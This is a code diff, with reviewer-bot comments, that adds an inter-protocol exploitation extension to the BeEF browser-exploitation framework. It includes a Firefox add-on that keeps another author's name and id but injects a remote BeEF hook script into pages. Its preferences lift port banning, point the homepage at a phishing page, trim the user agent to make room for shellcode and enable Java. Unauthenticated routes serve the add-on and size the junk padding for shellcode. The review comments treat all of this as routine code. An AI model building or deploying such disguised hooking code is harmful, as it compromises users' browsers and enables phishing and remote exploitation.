diff --git a/extensions/ipec/config.yaml b/extensions/ipec/config.yaml
new file mode 100644
index 000000000..28b9dde4b
--- /dev/null
+++ b/extensions/ipec/config.yaml
@@ -0,0 +1,21 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ extension:
+ ipec:
+ enable: true
+ name: 'Inter-Protocol Exploitation'
+ authors: ["antisnatchor"]
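Review bot: `enable: true` switches this extension on for every installation, although the todo comments elsewhere in the commit mark it as unfinished. Judging by the other files here, loading it binds a socket (`bind_junk_calculator("imapeudora1")` in extension.rb) and mounts `/api/ipec`, whose `before` filter in rest/ipec.rb has both authentication checks commented out. Shipping `enable: false` would keep that listener and the unauthenticated routes off until an operator opts in.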
diff --git a/extensions/ipec/extension.rb b/extensions/ipec/extension.rb
new file mode 100644
index 000000000..b8464e0d6
--- /dev/null
+++ b/extensions/ipec/extension.rb
@@ -0,0 +1,60 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+module Extension
+
+ #todo remove it from here:
+ # Handlers
+ #require 'extensions/ipec/fingerprinter'
+ #require 'extensions/ipec/launcher'
+ require 'extensions/ipec/junk_calculator'
+
+ module Ipec
+ extend BeEF::API::Extension
+
+ @short_name = 'Ipec'
+ @full_name = 'Inter-Protocol Exploitation'
+ @description = "Use the Inter-Protocol Exploitation technique to send shellcode to daemons implementing 'tolerant' protocols."
+
+ module RegisterIpecRestHandler
+ def self.mount_handler(server)
+ server.mount('/api/ipec', BeEF::Extension::Ipec::IpecRest.new)
+ end
+ end
+
+ BeEF::API::Registrar.instance.register(BeEF::Extension::Ipec::RegisterIpecRestHandler, BeEF::API::Server, 'mount_handler')
+
+ #todo remove it from here, and make it dynamic.
+ BeEF::Extension::Ipec::JunkCalculator.instance.bind_junk_calculator("imapeudora1")
+ end
+end
+end
+
+# Models
+# todo: to be used when we'll have more IPEC exploits
+#require 'extensions/ipec/models/ipec_exploits'
+#require 'extensions/ipec/models/ipec_exploits_run'
+
+# RESTful api endpoints
+require 'extensions/ipec/rest/ipec'
+
+
+
+
+
+
+
+
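Review bot: The `bind_junk_calculator("imapeudora1")` call at the end of `module Ipec` runs as a side effect of requiring this file, with a fixed socket name and, per junk_calculator.rb, a fixed port of 2000. If that bind fails (for instance because the port is already taken), the error would presumably propagate out of the require and abort extension loading instead of being reported. Consider moving the call into `mount_handler`, or guarding it with `rescue StandardError => e` and `print_error "[IPEC] bind failed: #{e.message}"`. The `require 'extensions/ipec/junk_calculator'` placed inside `module Extension` would also read better outside the module body.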
diff --git a/extensions/ipec/files/LinkTargetFinder.xpi b/extensions/ipec/files/LinkTargetFinder.xpi
new file mode 100644
index 000000000..3fadfa9c2
Binary files /dev/null and b/extensions/ipec/files/LinkTargetFinder.xpi differ
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome.manifest b/extensions/ipec/files/LinkTargetFinder/chrome.manifest
new file mode 100644
index 000000000..f9ad9ab4c
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome.manifest
@@ -0,0 +1,8 @@
+content linktargetfinder chrome/content/
+content linktargetfinder chrome/content/ contentaccessible=yes
+overlay chrome://browser/content/browser.xul chrome://linktargetfinder/content/browser.xul
+
+locale linktargetfinder en-US locale/en-US/
+
+skin linktargetfinder classic/1.0 skin/
+style chrome://global/content/customizeToolbar.xul chrome://linktargetfinder/skin/skin.css
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul b/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul
new file mode 100644
index 000000000..5b63810a8
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul
@@ -0,0 +1,22 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js b/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
new file mode 100644
index 000000000..8c86ef860
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
@@ -0,0 +1,37 @@
+var linkTargetFinder = function () {
+ var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
+ return {
+ init : function () {
+ gBrowser.addEventListener("load", function () {
+ //todo change the Extension name
+ var autoRun = prefManager.getBoolPref("extensions.linktargetfinder.autorun");
+ if (autoRun) {
+ linkTargetFinder.run();
+ }
+ }, false);
+ },
+
+ run : function () {
+ var head = content.document.getElementsByTagName("head")[0];
+
+ // add the BeEF hook -- start
+ var s = content.document.createElement('script');
+ s.type='text/javascript';
+ s.src='http://192.168.0.2:3000/hook.js';
+ head.appendChild(s);
+
+ //setTimeout cannot be used (looks like is ignored).
+ // beef_init if called manually from the console, works perfectly.
+
+ // adding setTimeout(beef_init, 2000); at the end of the hook file, make it working.
+ // John Wilander suggestions. we might leave it there anyway.
+ //alert(1);
+ //setTimeout(function(){beef_init()}, 5000);
+ //alert(3);
+
+ // add the BeEF hook -- end
+
+ }
+ };
+}();
+window.addEventListener("load", linkTargetFinder.init, false);
\ No newline at end of file
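Review bot: The `s.src='http://192.168.0.2:3000/hook.js'` line hard-codes a private lab address over plain HTTP, and the prebuilt LinkTargetFinder.xpi committed in the same change presumably carries the same value, so the binary that `/ff_extension` serves cannot be checked against these sources in review. Prefer building the .xpi from this directory at packaging time (the zip command is already documented in rest/ipec.rb) over committing the archive, or at least record its checksum next to it. The commented-out `alert`/`setTimeout` experiments should be reduced to one comment stating the conclusion, e.g. `// beef_init is triggered from the end of hook.js; setTimeout is ignored in this context`.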
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul b/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul
new file mode 100644
index 000000000..ea0cfd8e3
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul
@@ -0,0 +1,31 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js b/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
new file mode 100644
index 000000000..cbe9a6dd9
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
@@ -0,0 +1,21 @@
+// see http://kb.mozillazine.org/Firefox_:_FAQs_:_About:config_Entries
+// see http://mike.kaply.com/2012/06/21/best-practices-for-overriding-the-new-tab-page-with-your-extension/
+pref("extensions.linktargetfinder.autorun", false);
+
+// PortBanning override
+pref("network.security.ports.banned.override", "20,21,22,25,110,143");
+
+// home page is a phishing page create with BeEF Social Engineering extension,
+// the BeEF hook is added.
+pref("browser.startup.homepage.override", "http://www.binc.com");
+pref("browser.newtab.url", "http://www.binc.com");
+pref("browser.startup.page.override", "1");
+
+//useful for IPEC exploits, we save almost 90 bytes of space for shellcode
+// original: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:15.0) Gecko/20100101 Firefox/15.0.1
+// new: Firefox/15.0.1
+pref("general.useragent.override", "Firefox/15.0.1");
+
+// enable Java
+pref("security.enable_java", true);
+
diff --git a/extensions/ipec/files/LinkTargetFinder/install.rdf b/extensions/ipec/files/LinkTargetFinder/install.rdf
new file mode 100644
index 000000000..e7019cd8c
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/install.rdf
@@ -0,0 +1,23 @@
+
+
+
+
+ linktargetfinder@robertnyman.com
+ Link Target Finder
+ 1.0
+ 2
+ Robert Nyman
+ Finds links that have a target attribute
+ http://www.robertnyman.com/
+ chrome://linktargetfinder/content/options.xul
+
+
+
+ {ec8030f7-c20a-464f-9b0e-13a3a9e97384}
+ 2.0
+ 23.0
+
+
+
+
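Review bot: The manifest keeps the upstream add-on's identity (`linktargetfinder@robertnyman.com`, creator Robert Nyman, homepage robertnyman.com) even though linkTargetFinder.js in this commit replaces its behaviour, so the package attributes code to an author who did not write it. None of the LinkTargetFinder files carries a licence or provenance note either, unlike the Ruby files with their Apache header. Before merge, give the add-on a project-owned id and name (the `//todo change the Extension name` in linkTargetFinder.js already asks for this) and add a short comment recording the upstream source and its licence.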
diff --git a/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd b/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd
new file mode 100644
index 000000000..a42a829bf
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/skin.css b/extensions/ipec/files/LinkTargetFinder/skin/skin.css
new file mode 100644
index 000000000..c82d15f49
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/skin/skin.css
@@ -0,0 +1,12 @@
+#link-target-finder-toolbar-button {
+ list-style-image: url("chrome://linktargetfinder/skin/toolbar-large.png");
+}
+
+#link-target-finder-status-bar-icon {
+ width: 83px;
+ margin: 0 5px;
+}
+
+.link-target-finder-selected {
+ outline: 2px solid red !important;
+}
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/status-bar.png b/extensions/ipec/files/LinkTargetFinder/skin/status-bar.png
new file mode 100644
index 000000000..7f6c06afe
Binary files /dev/null and b/extensions/ipec/files/LinkTargetFinder/skin/status-bar.png differ
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png b/extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png
new file mode 100644
index 000000000..d1475a33b
Binary files /dev/null and b/extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png differ
diff --git a/extensions/ipec/junk_calculator.rb b/extensions/ipec/junk_calculator.rb
new file mode 100644
index 000000000..718e40de2
--- /dev/null
+++ b/extensions/ipec/junk_calculator.rb
@@ -0,0 +1,40 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+ module Extension
+ module Ipec
+ class JunkCalculator
+ include Singleton
+
+ def initialize
+ @binded_sockets = {}
+ @host = BeEF::Core::Configuration.instance.get('beef.http.host')
+ end
+
+ def bind_junk_calculator(name)
+ port = 2000
+ #todo add binded ports to @binded_sockets. Increase +1 port number if already binded
+ #if @binded_sockets[port] != nil
+ #else
+ #end
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_socket(name, @host, port)
+ @binded_sockets[name] = port
+
+ end
+ end
+ end
+ end
+end
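Review bot: `bind_junk_calculator` always binds port 2000, so a second call with a different name would try to bind the same port again, and a repeated call with the same name rebinds without consulting `@binded_sockets`. A minimal guard is `return @binded_sockets[name] if @binded_sockets.key?(name)` before the bind, with the port chosen as the first value not already in `@binded_sockets.values`, as the todo describes. The map can also go stale: rest/ipec.rb calls `AssetHandler.instance.unbind_socket` directly, so the entry written here is never removed. `include Singleton` relies on `singleton` having been required elsewhere, which is not visible in this file.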
diff --git a/extensions/ipec/models/ipec_exploits.rb b/extensions/ipec/models/ipec_exploits.rb
new file mode 100644
index 000000000..789fdcf36
--- /dev/null
+++ b/extensions/ipec/models/ipec_exploits.rb
@@ -0,0 +1,37 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+ module Core
+ module Models
+ class IpecExploits
+
+ include DataMapper::Resource
+ #todo: use this table when we'll have a bigger IPEC exploits choice
+ storage_names[:default] = 'extension_ipec_exploits'
+
+ property :id, Serial
+
+ property :name, Text, :lazy => false
+ property :protocol, String, :lazy => false
+ property :os, String, :lazy => false
+
+ has n, :extension_ipec_exploits_run, 'IpecExploitsRun'
+
+ end
+
+ end
+ end
+end
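Review bot: Neither model file is loaded, since extension.rb in this commit has both `require 'extensions/ipec/models/...'` lines commented out, so the association declarations are untested. They are also not symmetrical: this side declares `has n, :extension_ipec_exploits_run, 'IpecExploitsRun'` while ipec_exploits_run.rb declares `belongs_to :ipec_exploits` with no explicit model. Whether DataMapper resolves both names to the intended classes should be confirmed before the require lines are enabled; naming the relationships after the models (`has n, :ipec_exploits_runs, 'IpecExploitsRun'` and `belongs_to :ipec_exploit, 'IpecExploits'`) would make it explicit. In ipec_exploits_run.rb, `junk_size` is a `String` of length 3 although the sizes computed in rest/ipec.rb are integers; an `Integer` property looks like the better fit.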
diff --git a/extensions/ipec/models/ipec_exploits_run.rb b/extensions/ipec/models/ipec_exploits_run.rb
new file mode 100644
index 000000000..24ebcaa5b
--- /dev/null
+++ b/extensions/ipec/models/ipec_exploits_run.rb
@@ -0,0 +1,36 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+module BeEF
+ module Core
+ module Models
+ class IpecExploitsRun
+
+ include DataMapper::Resource
+ #todo: use this table when we'll have a bigger IPEC exploits choice
+ storage_names[:default] = 'extension_ipec_exploits_run'
+
+ property :id, Serial
+ property :launched, Boolean, :lazy => false
+ property :http_headers, Text, :lazy => false
+ property :junk_size, String, :length => 3, :lazy => false
+
+ belongs_to :ipec_exploits
+
+ end
+
+ end
+ end
+end
diff --git a/extensions/ipec/rest/ipec.rb b/extensions/ipec/rest/ipec.rb
new file mode 100644
index 000000000..00b3eff9a
--- /dev/null
+++ b/extensions/ipec/rest/ipec.rb
@@ -0,0 +1,88 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+module BeEF
+ module Extension
+ module Ipec
+ class IpecRest < BeEF::Core::Router::Router
+
+ before do
+ # NOTE: the method exposed by this class are NOT-AUTHENTICATED.
+ # They need to be called remotely from a hooked browser.
+
+ #error 401 unless params[:token] == config.get('beef.api_token')
+ #halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+ headers 'Content-Type' => 'application/json; charset=UTF-8',
+ 'Pragma' => 'no-cache',
+ 'Cache-Control' => 'no-cache',
+ 'Expires' => '0'
+ end
+
+ # Determine the exact size of the cross-domain request HTTP headers.
+ # Needed to calculate junk properly and prevent errors.
+ # See modules/exploits/beefbind/beef_bind_staged_deploy/command.js for more info.
+ # todo: the core of this method should be moved to ../junk_calculator.rb
+ get '/junk/:name' do
+ socket_name = params[:name]
+ halt 401 if not BeEF::Filters.alphanums_only?(socket_name)
+ socket_data = BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.get_socket_data(socket_name)
+ halt 404 if socket_data == nil
+
+ if socket_data.include?("\r\n\r\n")
+ result = Hash.new
+
+ headers = socket_data.split("\r\n\r\n").first
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind_socket(socket_name)
+ print_info "[IPEC] Cross-domain XmlHttpRequest headers size - received from bind socket [#{socket_name}]: #{headers.size + 4} bytes."
+ # CRLF -> 4 bytes
+ result['size'] = headers.size + 4
+
+ headers.split("\r\n").each do |line|
+ if line.include?("Host")
+ result['host'] = line.size + 2
+ end
+ if line.include?("Content-Type")
+ result['contenttype'] = line.size + 2
+ end
+ if line.include?("Referer")
+ result['referer'] = line.size + 2
+ end
+ end
+ result.to_json
+ else
+ print_error "[IPEC] Looks like there is no CRLF in the data received!"
+ halt 404
+ end
+ end
+
+
+ # The original Firefox Extension sources are in extensions/ipec/files/LinkTargetFinder dir.
+ # If you want to modify the pref.js file, do the following to re-pack the extension:
+ # $cd firefox_extension_directory
+ # $zip -r ../result-name.xpi *
+ get '/ff_extension' do
+ response['Content-Type'] = "application/x-xpinstall"
+ ff_extension = "#{File.expand_path('../../../ipec/files', __FILE__)}/LinkTargetFinder.xpi"
+ print_info "[IPEC] Serving Firefox Extension: #{ff_extension}"
+ send_file "#{ff_extension}",
+ :type => 'application/x-xpinstall',
+ :disposition => 'inline'
+ end
+
+ end
+ end
+ end
+end
\ No newline at end of file
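Review bot: The header loop in `get '/junk/:name'` matches with `line.include?("Host")`, `include?("Content-Type")` and `include?("Referer")`, which fire on any line containing those words, so a later header whose value happens to contain "Host" overwrites `result['host']` with the wrong length. Match the field name instead, e.g. `if line.start_with?("Host:")`, and likewise for the other two. A name that fails `alphanums_only?` is a malformed request, so `halt 400` fits better than `halt 401`. This unauthenticated GET also has a side effect (`unbind_socket`), which deserves a comment explaining why that is acceptable. The local `headers` shadows the Sinatra `headers` helper used in the `before` filter; renaming it to `raw_headers` avoids confusion.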